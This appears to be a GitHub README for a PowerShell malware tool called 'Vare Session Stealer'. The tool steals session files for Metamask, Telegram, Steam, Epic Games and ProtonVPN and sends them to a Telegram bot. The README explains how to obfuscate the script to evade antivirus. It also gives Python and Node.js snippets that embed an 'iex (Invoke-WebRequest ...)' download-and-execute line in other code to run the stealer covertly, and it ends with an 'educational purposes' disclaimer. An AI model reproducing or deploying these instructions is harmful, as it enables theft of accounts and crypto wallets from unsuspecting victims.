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File metadata and controls

97 lines (75 loc) · 3.05 KB


Vare Session Stealer

Powershell Session Stealer
Telegram Channel

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About The Project

Vare Session Stealer is a file stealer that aims to bypass Antiviruses during Runtime and Scantime using Powershell


└─$ cat VareSessionStealer

| Metamask Session File - From Opera, OperaGX, Chrome [Profile 1,2,3]
| Telegram Session File - From Base Path
| Steam Session File - From Base Path
| Epicgames Session File - From Base Path
| ProtonVPN Session File - From Base Path


  1. Download Project
  2. Change $chatid And $bottoken With Yours
  3. Obfuscate "PS1" File Using AES Encoder
  4. You're Done!

Integrate with your code

Upload the code you created and obfuscate to places that provide direct downloads such as discord and get the link (ex;


import subprocess

powershell_cmd = "iex (Invoke-WebRequest -Uri 'YOUR FILE URL' -UseBasicParsing).Content"["powershell", "-Command", powershell_cmd], capture_output=False, text=False)

Change "YOUR FILE URL" then add this to your code


const { exec } = require('child_process');

const powershellCmd = "iex (Invoke-WebRequest -Uri 'YOUR FILE URL' -UseBasicParsing).Content";

exec(`powershell -Command "${powershellCmd}"`, (error, stdout, stderr) => {});

Change "YOUR FILE URL" then add this to your code - i havent tested it but it will work 🤓

🤝 Contributing

If you want to support me and my project, you can do the following, thank you

  1. Fork the Project
  2. Star the Project
  3. Open a Pull Request


  • Anti Virustotal / AntiVM
  • More Sessions (Gaming,Vpns,etc...)
  • Anti Analysis
  • New Obfuscation (Maybe 🤓)

🛑 Note

I am not responsible for the damages caused by this code, everyone will use this code under their own responsibility, the code is shared for educational purposes. POC

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